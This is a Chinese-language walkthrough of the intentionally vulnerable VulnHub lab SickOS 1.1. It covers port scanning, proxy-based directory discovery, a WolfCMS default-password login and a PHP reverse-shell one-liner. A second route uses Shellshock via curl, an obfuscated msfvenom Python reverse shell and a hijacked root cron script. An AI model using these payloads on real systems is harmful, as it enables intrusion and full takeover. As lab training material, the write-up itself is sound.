Sickos1_1

Sickos1.1

下载地址:https://download.vulnhub.com/sickos/sick0s1.1.7z

一、主机发现

┌──(de1te㉿de1te)-[~]
└─$ sudo nmap -sn 192.168.239.0/24
[sudo] de1te 的密码:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-29 09:47 CST
Nmap scan report for 192.168.239.1
Host is up (0.0014s latency).
MAC Address: 00:50:56:C0:00:03 (VMware)
Nmap scan report for 192.168.239.133
Host is up (0.00016s latency).
MAC Address: 00:0C:29:D9:46:32 (VMware)
Nmap scan report for 192.168.239.254
Host is up (0.00011s latency).
MAC Address: 00:50:56:F4:69:7B (VMware)
Nmap scan report for 192.168.239.129
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 19.04 seconds

192.168.239.133 是靶机ip

二、nmap扫描及思路分析

  1. 查看开放端口

    ┌──(de1te㉿de1te)-[~]
    └─$ sudo nmap --min-rate 10000 -p- 192.168.239.133
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-29 09:49 CST
    Nmap scan report for 192.168.239.133
    Host is up (0.00037s latency).
    Not shown: 65532 filtered tcp ports (no-response)
    PORT     STATE  SERVICE
    22/tcp   open   ssh
    3128/tcp open   squid-http
    8080/tcp closed http-proxy
    MAC Address: 00:0C:29:D9:46:32 (VMware)
    
    Nmap done: 1 IP address (1 host up) scanned in 21.99 seconds
    

    开放了22、3128端口,8080能被扫出来但是被关了

  2. 查看开放端口的服务及版本号

    ┌──(de1te㉿de1te)-[~]
    └─$ sudo nmap -sT -sV -O -p 22,3128,8080 192.168.239.133   
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-29 09:51 CST
    Nmap scan report for 192.168.239.133
    Host is up (0.00043s latency).
    
    PORT     STATE  SERVICE    VERSION
    22/tcp   open   ssh        OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
    3128/tcp open   http-proxy Squid http proxy 3.1.19
    8080/tcp closed http-proxy
    MAC Address: 00:0C:29:D9:46:32 (VMware)
    Device type: general purpose
    Running: Linux 3.X|4.X
    OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
    OS details: Linux 3.2 - 4.9
    Network Distance: 1 hop
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 22.07 seconds
    

    尝试用UDP进行扫描

    ┌──(de1te㉿de1te)-[~]
    └─$ sudo nmap -sU -p 22,3128,8080 192.168.239.133       
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-29 09:55 CST
    Nmap scan report for 192.168.239.133
    Host is up (0.00040s latency).
    
    PORT     STATE         SERVICE
    22/udp   open|filtered ssh
    3128/udp open|filtered ndl-aas
    8080/udp open|filtered http-alt
    MAC Address: 00:0C:29:D9:46:32 (VMware)
    
    Nmap done: 1 IP address (1 host up) scanned in 9.90 seconds
    

    没有获取到有价值的信息

  3. 用nmap简单扫描一下漏洞

    ┌──(de1te㉿de1te)-[~]
    └─$ sudo nmap --script=vuln -p22,3128,8080 192.168.239.133 
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-29 10:00 CST
    Nmap scan report for 192.168.239.133
    Host is up (0.00056s latency).
    
    PORT     STATE  SERVICE
    22/tcp   open   ssh
    3128/tcp open   squid-http
    8080/tcp closed http-proxy
    MAC Address: 00:0C:29:D9:46:32 (VMware)
    
    Nmap done: 1 IP address (1 host up) scanned in 19.93 seconds
    

    没有啥简单的漏洞

  4. 总结:

    • 22端口是ssh服务。
    • 3128是http代理服务,用的是Squid http proxy版本
    • 8080端口也是http代理,但是是关闭的
    • 系统版本是liunx3.2-4.9 之间

    一般来说,22端口不可能会直接被攻击。所以我们可以尝试一下3128端口。

    3128和8080端口都显示http服务,所以我们尝试用浏览器看一下。

    3128端口显示如下

    ERROR
    The requested URL could not be retrieved
    
    The following error was encountered while trying to retrieve the URL: /
    
        Invalid URL
    
    Some aspect of the requested URL is incorrect.
    
    Some possible problems are:
    
        Missing or incorrect access protocol (should be "http://" or similar)
    
        Missing hostname
    
        Illegal double-escape in the URL-Path
    
        Illegal character in hostname; underscores are not allowed.
    
    Your cache administrator is webmaster.
    
    Generated Wed, 29 Mar 2023 10:09:00 GMT by localhost (squid/3.1.19)
    

    百度搜索了一下,发现squid 是代理服务器

三、Squid代理分析与设置

  1. 目录爆破

    对端口3128进行爆破

    ┌──(de1te㉿de1te)-[~]
    └─$ sudo dirb http://192.168.239.133                               
    
    -----------------
    DIRB v2.22    
    By The Dark Raver
    -----------------
    
    START_TIME: Wed Mar 29 13:01:54 2023
    URL_BASE: http://192.168.239.133/
    WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
    
    -----------------
    
    GENERATED WORDS: 4612                                                          
    
    ---- Scanning URL: http://192.168.239.133/ ----
    *** Calculating NOT_FOUND code...
                                                                                   
    (!) FATAL: Too many errors connecting to host
        (Possible cause: OPERATION TIMEOUT)
                                                                                   
    -----------------
    END_TIME: Wed Mar 29 13:04:24 2023
    DOWNLOADED: 0 - FOUND: 0
    

    gobuster:

    ┌──(de1te㉿de1te)-[~]
    └─$ sudo gobuster dir -u 192.168.239.133 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt            
    ===============================================================
    Gobuster v3.5
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
    ===============================================================
    [+] Url:                     http://192.168.239.133
    [+] Method:                  GET
    [+] Threads:                 10
    [+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
    [+] Negative Status codes:   404
    [+] User Agent:              gobuster/3.5
    [+] Timeout:                 10s
    ===============================================================
    2023/03/29 12:56:48 Starting gobuster in directory enumeration mode
    ===============================================================
    
    Error: error on running gobuster: unable to connect to http://192.168.239.133/: Get "http://192.168.239.133/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
    
    

    报错了,emm尝试用代理端口3128进行目录爆破

    ┌──(de1te㉿de1te)-[~]
    └─$ sudo dirb http://192.168.239.133 -p http://192.168.239.133:3128                                                                                                                                                                       
    
    -----------------
    DIRB v2.22    
    By The Dark Raver
    -----------------
    
    START_TIME: Wed Mar 29 13:05:28 2023
    URL_BASE: http://192.168.239.133/
    WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
    PROXY: http://192.168.239.133:3128
    
    -----------------
    
    GENERATED WORDS: 4612                                                          
    
    ---- Scanning URL: http://192.168.239.133/ ----
    + http://192.168.239.133/cgi-bin/ (CODE:403|SIZE:291)                                                                                                                                                                                     
    + http://192.168.239.133/connect (CODE:200|SIZE:109)                                                                                                                                                                                      
    + http://192.168.239.133/index (CODE:200|SIZE:21)                                                                                                                                                                                         
    + http://192.168.239.133/index.php (CODE:200|SIZE:21)                                                                                                                                                                                     
    + http://192.168.239.133/robots (CODE:200|SIZE:45)                                                                                                                                                                                        
    + http://192.168.239.133/robots.txt (CODE:200|SIZE:45)                                                                                                                                                                                    
    + http://192.168.239.133/server-status (CODE:403|SIZE:296)                                                                                 
    -----------------
    END_TIME: Wed Mar 29 13:05:33 2023
    DOWNLOADED: 4612 - FOUND: 7
    

四、web爆破

扫描出了几个目录。将192.168.239.133:3128端口设置为代理服务器再进行访问

查看8080端口

BLEHHH!!! 

查看roboots.txt

roboots.txt
User-agent: *
Disallow: /
Dissalow: /wolfcms

出现wolfcms,再查看一下

  • 看到cms,就要想能不能找到管理目录,google

    wolfcms admin path
    

    浏览网页,发现管理目录一般为?加admin

    /wolfcms/?/admin/plugin
    

查看网页发现也有?,尝试一下

如何登录?

  • 暴力破解
  • 默认的用户名和密码
  • 弱密码进行尝试

通过google搜索,发现用户名多为admin。所以以admin为用户名进行弱密码尝试。

通过多次尝试,最终

admin----->admin

发现好多php代码,可以尝试使用一句话木马进行反弹shell进行操作

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.239.128/443 0>&1'");?>

开启监听端口

sudo nc -lvnp 443

反射成功

www-data@SickOs:/var/www/wolfcms$         

五、获得初始权限与提权

  1. 查看目录·

    www-data@SickOs:/var/www/wolfcms$ ls
    ls
    CONTRIBUTING.md
    README.md
    composer.json
    config.php
    docs
    favicon.ico
    index.php
    public
    robots.txt
    wolf
    

    config.php配置文件一定要注意

    查看一下

    define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
    define('DB_USER', 'root'); # 用户名
    define('DB_PASS', 'john@123');  # 密码
    define('TABLE_PREFIX', '');
    

    查看用户

    www-data@SickOs:/var/www/wolfcms$ cat /etc/passwd
    cat /etc/passwd
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    bin:x:2:2:bin:/bin:/bin/sh
    sys:x:3:3:sys:/dev:/bin/sh
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/bin/sh
    man:x:6:12:man:/var/cache/man:/bin/sh
    lp:x:7:7:lp:/var/spool/lpd:/bin/sh
    mail:x:8:8:mail:/var/mail:/bin/sh
    news:x:9:9:news:/var/spool/news:/bin/sh
    uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
    proxy:x:13:13:proxy:/bin:/bin/sh
    www-data:x:33:33:www-data:/var/www:/bin/sh
    backup:x:34:34:backup:/var/backups:/bin/sh
    list:x:38:38:Mailing List Manager:/var/list:/bin/sh
    irc:x:39:39:ircd:/var/run/ircd:/bin/sh
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
    nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
    libuuid:x:100:101::/var/lib/libuuid:/bin/sh
    syslog:x:101:103::/home/syslog:/bin/false
    messagebus:x:102:105::/var/run/dbus:/bin/false
    whoopsie:x:103:106::/nonexistent:/bin/false
    landscape:x:104:109::/var/lib/landscape:/bin/false
    sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
    sickos:x:1000:1000:sickos,,,:/home/sickos:/bin/bash
    mysql:x:106:114:MySQL Server,,,:/nonexistent:/bin/false
    

    根据以上信息,看看能不能ssh

    sudo ssh [email protected]                                                                       │    link/ether 00:0c:29:4c:a6:2d brd ff:ff:ff:ff:ff:ff
    The authenticity of host '192.168.239.133 (192.168.239.133)' can't be established.                      │    inet 192.168.239.129/24 brd 192.168.239.255 scope global dynamic noprefixroute eth0
    ECDSA key fingerprint is SHA256:fBxcsD9oGyzCgdxtn34OtTEDXIW4E9/RlkxombNm0y8.                            │       valid_lft 1237sec preferred_lft 1237sec
    This key is not known by any other names.                                                               │    inet6 fe80::5cf0:65a1:a51:3563/64 scope link noprefixroute 
    Are you sure you want to continue connecting (yes/no/[fingerprint])? y                                  │       valid_lft forever preferred_lft forever
    Please type 'yes', 'no' or the fingerprint: yes                                                         │3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    Warning: Permanently added '192.168.239.133' (ECDSA) to the list of known hosts.                        │    link/ether 00:0c:29:4c:a6:37 brd ff:ff:ff:ff:ff:ff
    [email protected]'s password:                                                                        │    inet 10.200.32.131/24 brd 10.200.32.255 scope global dynamic noprefixroute eth1
    Permission denied, please try again.                                                                    │       valid_lft 1558sec preferred_lft 1558sec
    [email protected]'s password:                                                                        │    inet6 fe80::a4bc:a43:bc59:400a/64 scope link noprefixroute 
    Permission denied, please try again.                                                                    │       valid_lft forever preferred_lft forever
    [email protected]'s password:                                                                        │                                                                                                         
    [email protected]: Permission denied (publickey,password).     
    

    root 用户不行,试一下其他的--backup

    ┌──(de1te㉿de1te)-[~]                                                                                   │3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    └─$ sudo ssh [email protected]                                                                     │    link/ether 00:0c:29:4c:a6:37 brd ff:ff:ff:ff:ff:ff
    [email protected]'s password:                                                                      │    inet 10.200.32.131/24 brd 10.200.32.255 scope global dynamic noprefixroute eth1
    Permission denied, please try again.                                                                    │       valid_lft 1558sec preferred_lft 1558sec
    [email protected]'s password:                                                                      │    inet6 fe80::a4bc:a43:bc59:400a/64 scope link noprefixroute 
    Permission denied, please try again.                                                                    │       valid_lft forever preferred_lft forever
    [email protected]'s password:                                                                      │                                                                                                         
    [email protected]: Permission denied (publickey,password).   
    

    试一下sickos

    (de1te㉿de1te)-[~]                                                                                   │┌──(de1te㉿de1te)-[~]
    └─$ sudo ssh [email protected]                                                                     │└─$ ip a
    [email protected]'s password:                                                                      │1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    Welcome to Ubuntu 12.04.4 LTS (GNU/Linux 3.11.0-15-generic i686)                                        │    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
                                                                                                            │    inet 127.0.0.1/8 scope host lo
     * Documentation:  https://help.ubuntu.com/                                                             │       valid_lft forever preferred_lft forever
                                                                                                            │    inet6 ::1/128 scope host 
      System information as of Wed Mar 29 19:19:58 IST 2023                                                 │       valid_lft forever preferred_lft forever
                                                                                                            │2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
      System load:  0.0               Processes:           116                                              │    link/ether 00:0c:29:4c:a6:2d brd ff:ff:ff:ff:ff:ff
      Usage of /:   4.3% of 28.42GB   Users logged in:     0                                                │    inet 192.168.239.129/24 brd 192.168.239.255 scope global dynamic noprefixroute eth0
      Memory usage: 12%               IP address for eth0: 192.168.239.133                                  │       valid_lft 1237sec preferred_lft 1237sec
      Swap usage:   0%                                                                                      │    inet6 fe80::5cf0:65a1:a51:3563/64 scope link noprefixroute 
                                                                                                            │       valid_lft forever preferred_lft forever
      Graph this data and manage this system at:                                                            │3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
        https://landscape.canonical.com/                                                                    │    link/ether 00:0c:29:4c:a6:37 brd ff:ff:ff:ff:ff:ff
                                                                                                            │    inet 10.200.32.131/24 brd 10.200.32.255 scope global dynamic noprefixroute eth1
    124 packages can be updated.                                                                            │       valid_lft 1558sec preferred_lft 1558sec
    92 updates are security updates.                                                                        │    inet6 fe80::a4bc:a43:bc59:400a/64 scope link noprefixroute 
                                                                                                            │       valid_lft forever preferred_lft forever
    New release '14.04.3 LTS' available.                                                                    │                                                                                                         
    Run 'do-release-upgrade' to upgrade to it.                                                              │            
                                                                                                            │┌──(de1te㉿de1te)-[~]
    Last login: Tue Sep 22 08:32:44 2015        
    

    成功!!!!

    查看权限:

    sickos@SickOs:~$ whoami
    sickos
    sickos@SickOs:~$ sudo -l
    [sudo] password for sickos: 
    Matching Defaults entries for sickos on this host:
        env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
    
    User sickos may run the following commands on this host:
        (ALL : ALL) ALL
    

    看了是root,新起bash

    sickos@SickOs:~$ sudo /bin/bash
    root@SickOs:~# 
    root@SickOs:~# pwd
    /home/sickos
    root@SickOs:~# cd /root
    root@SickOs:/root# 
    root@SickOs:/root# ls  
    a0216ea4d51874464078c618298b1367.txt
    root@SickOs:/root# cat a0216ea4d51874464078c618298b1367.txt 
    If you are viewing this!!
    
    ROOT!
    
    You have Succesfully completed SickOS1.1.
    Thanks for Trying
    
    
    root@SickOs:/root# 
    
    

    拿下!!!

六、第二种思路

理由shellshock漏洞获得反弹shell,然后再进行提权等一系列的操作

关于shellshock:

https://wooyun.js.org/drops/Shellshock漏洞回顾与分析测试.html

https://github.com/opsxcq/exploit-CVE-2014-6271

关于定时任务:

https://blog.csdn.net/weixin_35977784/article/details/117011839

  1. 使用nikto工具进行扫描

    ┌──(de1te㉿de1te)-[~]
    └─$ sudo nikto -h 192.168.239.133 -useproxy http://192.168.239.133:3128
    [sudo] de1te 的密码:
    - Nikto v2.5.0
    ---------------------------------------------------------------------------
    + Target IP:          192.168.239.133
    + Target Hostname:    192.168.239.133
    + Target Port:        80
    + Proxy:              192.168.239.133:3128
    + Start Time:         2023-03-30 09:34:59 (GMT8)
    ---------------------------------------------------------------------------
    + Server: Apache/2.2.22 (Ubuntu)
    + /: Retrieved via header: 1.0 localhost (squid/3.1.19).
    + /: Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.21.
    + /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
    + /: Uncommon header 'x-cache-lookup' found, with contents: MISS from localhost:3128.
    + /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
    + /robots.txt: Server may leak inodes via ETags, header found with file /robots.txt, inode: 265381, size: 45, mtime: Sat Dec  5 08:35:02 2015. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
    + : Server banner changed from 'Apache/2.2.22 (Ubuntu)' to 'squid/3.1.19'.
    + /: Uncommon header 'x-squid-error' found, with contents: ERR_INVALID_REQ 0.
    + /index: Uncommon header 'tcn' found, with contents: list.
    + /index: Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. The following alternatives for 'index' were found: index.php. See: http://www.wisec.it/sectou.php?id=4698ebdc59d15,https://exchange.xforce.ibmcloud.com/vulnerabilities/8275
    + Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
    + /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
    + /cgi-bin/status: Uncommon header '93e4r0-cve-2014-6278' found, with contents: true.
    + /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
    + /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
    + /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
    + /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
    + /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
    + /.bash_history: A user's home directory may be set to the web root, the shell history was retrieved. This should not be accessible via the web.
    + /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
    + /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
    + 8919 requests: 9 error(s) and 21 item(s) reported on remote host
    + End Time:           2023-03-30 09:38:33 (GMT8) (214 seconds)
    ---------------------------------------------------------------------------
    + 1 host(s) tested
    

    提示有shellshock漏洞,看看能不能利用

    ┌──(de1te㉿de1te)-[~]
    └─$ sudo curl -v --proxy http://192.168.239.133:3128 http://192.168.239.133/cgi-bin/status -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'"
    [sudo] de1te 的密码:
    *   Trying 192.168.239.133:3128...
    * Connected to 192.168.239.133 (192.168.239.133) port 3128 (#0)
    > GET http://192.168.239.133/cgi-bin/status HTTP/1.1
    > Host: 192.168.239.133
    > Accept: */*
    > Proxy-Connection: Keep-Alive
    > user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'
    > 
    * HTTP 1.0, assume close after body
    < HTTP/1.0 200 OK
    < Date: Thu, 30 Mar 2023 09:54:26 GMT
    < Server: Apache/2.2.22 (Ubuntu)
    < X-Cache: MISS from localhost
    < X-Cache-Lookup: MISS from localhost:3128
    < Via: 1.0 localhost (squid/3.1.19)
    < Connection: close
    < 
    
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    bin:x:2:2:bin:/bin:/bin/sh
    sys:x:3:3:sys:/dev:/bin/sh
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/bin/sh
    man:x:6:12:man:/var/cache/man:/bin/sh
    lp:x:7:7:lp:/var/spool/lpd:/bin/sh
    mail:x:8:8:mail:/var/mail:/bin/sh
    news:x:9:9:news:/var/spool/news:/bin/sh
    uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
    proxy:x:13:13:proxy:/bin:/bin/sh
    www-data:x:33:33:www-data:/var/www:/bin/sh
    backup:x:34:34:backup:/var/backups:/bin/sh
    list:x:38:38:Mailing List Manager:/var/list:/bin/sh
    irc:x:39:39:ircd:/var/run/ircd:/bin/sh
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
    nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
    libuuid:x:100:101::/var/lib/libuuid:/bin/sh
    syslog:x:101:103::/home/syslog:/bin/false
    messagebus:x:102:105::/var/run/dbus:/bin/false
    whoopsie:x:103:106::/nonexistent:/bin/false
    landscape:x:104:109::/var/lib/landscape:/bin/false
    sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
    sickos:x:1000:1000:sickos,,,:/home/sickos:/bin/bash
    mysql:x:106:114:MySQL Server,,,:/nonexistent:/bin/false
    * Closing connection 0
    

    可以执行,验证成功。构造payload

    sudo msfvenom -p cmd/unix/reverse_bash lhost=192.168.239.129 lport=443 -f raw   
    
    bash -c '0<&94-;exec 94<>/dev/tcp/192.168.239.129/443;sh <&94 >&94 2>&94'   
    

    开启监听

    sudo nc -lvnp 443  
    

    反弹shell的payload

    sudo curl -v --proxy http://192.168.239.133:3128 http://192.168.239.133/cgi-bin/status -H "user-agent: () { :; }; echo; echo; /bin/bash -c '0<&94-;exec 94<>/dev/tcp/192.168.239.129/443;sh <&94 >&94 2>&94'"
    

    获得反弹shell,是一个不友好的shell

    ls
    status
    whoami
    www-data
    uname -a
    Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 athlon i386 GNU/Linux
    dpkg -l # 发现有python
    # 尝试变成一个友好shell界面
    python -c "import pty;pty.spawn('/bin/bash')"
    www-data@SickOs:/usr/lib/cgi-bin$ 
    

    看一下网站下哪些信息我们可以使用

    www-data@SickOs:/usr/lib/cgi-bin$ cd /var/www
    cd /var/www
    www-data@SickOs:/var/www$ ls
    ls
    connect.py  index.php  robots.txt  wolfcms
    www-data@SickOs:/var/www$ ls -liah 
    ls -liah 
    total 28K
    264214 drwxrwxrwx  3 root     root     4.0K Mar 29 19:14 .
    262145 drwxr-xr-x 13 root     root     4.0K Dec  6  2015 ..
    265283 -rw-------  1 www-data www-data   44 Mar 29 19:14 .bash_history
    265380 -rwxrwxrwx  1 root     root      109 Dec  5  2015 connect.py
    265379 -rw-r--r--  1 root     root       21 Dec  5  2015 index.php
    265381 -rw-r--r--  1 root     root       45 Dec  5  2015 robots.txt
    264349 drwxr-xr-x  5 root     root     4.0K Dec  5  2015 wolfcms
    

    查看一下各个文件

    www-data@SickOs:/var/www$ cat .bash_history
    cat .bash_history
    cat /etc/passwd
    cat /etc/passwd | grep 'sh'
    www-data@SickOs:/var/www$ python connect.py
    python connect.py
    I Try to connect things very frequently
    
    You may want to try my services
    

    这是一个提示,提示我们可以使用定时任务

    www-data@SickOs:/etc/cron.d$ cd /etc # 进入etc目录
    cd /etc
    www-data@SickOs:/etc$ ls -lish | grep 'cron'  # 列出带‘cron’关键字的目录
    ls -lish | grep 'cron'
    131439 4.0K drwxr-xr-x 2 root root   4.0K Dec  5  2015 cron.d
    131120 4.0K drwxr-xr-x 2 root root   4.0K Sep 22  2015 cron.daily
    131443 4.0K drwxr-xr-x 2 root root   4.0K Sep 22  2015 cron.hourly
    131431 4.0K drwxr-xr-x 2 root root   4.0K Sep 22  2015 cron.monthly
    131433 4.0K drwxr-xr-x 2 root root   4.0K Sep 22  2015 cron.weekly
    131437 4.0K -rw-r--r-- 1 root root    722 Jun 20  2012 crontab
    www-data@SickOs:/etc$ cat crontab  # 查看crontab
    cat crontab 
    # /etc/crontab: system-wide crontab
    # Unlike any other crontab you don't have to run the `crontab'
    # command to install the new version when you edit this file
    # and files in /etc/cron.d. These files also have username fields,
    # that none of the other crontabs do.
    
    SHELL=/bin/sh
    PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
    
    # m h dom mon dow user  command
    17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
    25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
    47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
    52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
    # 显示定时计划在三个目录里面,分别查看一下
    www-data@SickOs:/etc$ cat cron.d  # 查看cron.d,发现是个目录
    cat cron.d
    cat: cron.d: Is a directory
    www-data@SickOs:/etc$ cd cron.d  # 进入cron.d目录
    cd cron.d
    www-data@SickOs:/etc/cron.d$ ls -lish  # 列出全部目录
    ls -lish 
    total 8.0K
    132895 4.0K -rw-r--r-- 1 root root  52 Dec  5  2015 automate
    132791 4.0K -rw-r--r-- 1 root root 544 Jul  2  2015 php5
    www-data@SickOs:/etc/cron.d$ cat automate # 查看automate 
    cat automate 
    
    * * * * * root /usr/bin/python /var/www/connect.py
    

    可以看出这个定时任务是每分钟一次,于是我们尝试看看能不能写入

    生成payload
    ┌──(de1te㉿de1te)-[~]
    └─$ sudo msfvenom -p cmd/unix/reverse_python lhost=192.168.239.129 lport=448 -f raw  
    [-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
    [-] No arch selected, selecting arch: cmd from the payload
    No encoder specified, outputting raw payload
    Payload size: 368 bytes
    python -c "exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNqNkNELgjAQxv+VsacNYrYlocQeJAwiKkjfJddCyTbx5v9fyyL0ye/luON333dc/Wxt5xBY9dAOLRCCvmw7qzSA7yygtzbop8qCk5jHgvF1xMQqZlzEeMx4QxmG0XgKcshgQyHfLtkV+1Oaf5KHSXbeHoosv6TJkU4smLLGaOUI8Xf4HZ9FJ5gFdutbQYDd60YbS6gnl7MoPosSE6qV/68xdW0agoOyNgFUmL4AhqJbBw==')[0])))"
    
    cd /var/www # 进入 /var/www目录
    vim connect.py # 编辑connect.py
    # 写入,然后查看写入
    www-data@SickOs:/var/www$ cat connect.py                      3,1           All
    cat connect.py                                                                  
    #!/usr/bin/python                                             2,1           Top
    
    exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNqNkNELgjAQxv+VsacNYrYlocQeJAwiKkjfJddCyTbx5v9fyyL0ye/luON333dc/Wxt5xBY9dAOLRCCvmw7qzSA7yygtzbop8qCk5jHgvF1xMQqZlzEeMx4QxmG0XgKcshgQyHfLtkV+1Oaf5KHSXbeHoosv6TJkU4smLLGaOUI8Xf4HZ9FJ5gFdutbQYDd60YbS6gnl7MoPosSE6qV/68xdW0agoOyNgFUmL4AhqJbBw==')[0]))
    
    
    print "I Try to connect things very frequently\n"
    print "You may want to try my services"
    www-data@SickOs:/var/www$ 
    

    开启监听:

    ┌──(de1te㉿de1te)-[~]
    └─$ sudo nc -lvnp 448
    listening on [any] 448 ...
    connect to [192.168.239.129] from (UNKNOWN) [192.168.239.133] 32869
    python -c "import pty;pty.spawn('/bin/bash')"
    root@SickOs:~# 
    root@SickOs:~# ls    
    ls
    a0216ea4d51874464078c618298b1367.txt
    root@SickOs:~# whoami
    whoami
    root
    root@SickOs:~# ip a
    ip a
    1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN 
        link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
        inet 127.0.0.1/8 scope host lo
           valid_lft forever preferred_lft forever
        inet6 ::1/128 scope host 
           valid_lft forever preferred_lft forever
    2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000
        link/ether 00:0c:29:d9:46:32 brd ff:ff:ff:ff:ff:ff
        inet 192.168.239.133/24 brd 192.168.239.255 scope global eth0
           valid_lft forever preferred_lft forever
        inet6 fe80::20c:29ff:fed9:4632/64 scope link 
           valid_lft forever preferred_lft forever
    root@SickOs:~# cat a0216ea4d51874464078c618298b1367.txt
    cat a0216ea4d51874464078c618298b1367.txt
    If you are viewing this!!
    
    ROOT!
    
    You have Succesfully completed SickOS1.1.
    Thanks for Trying
    

    完成!!!

热门相关:无量真仙   大神你人设崩了   大神你人设崩了   寂静王冠   刺客之王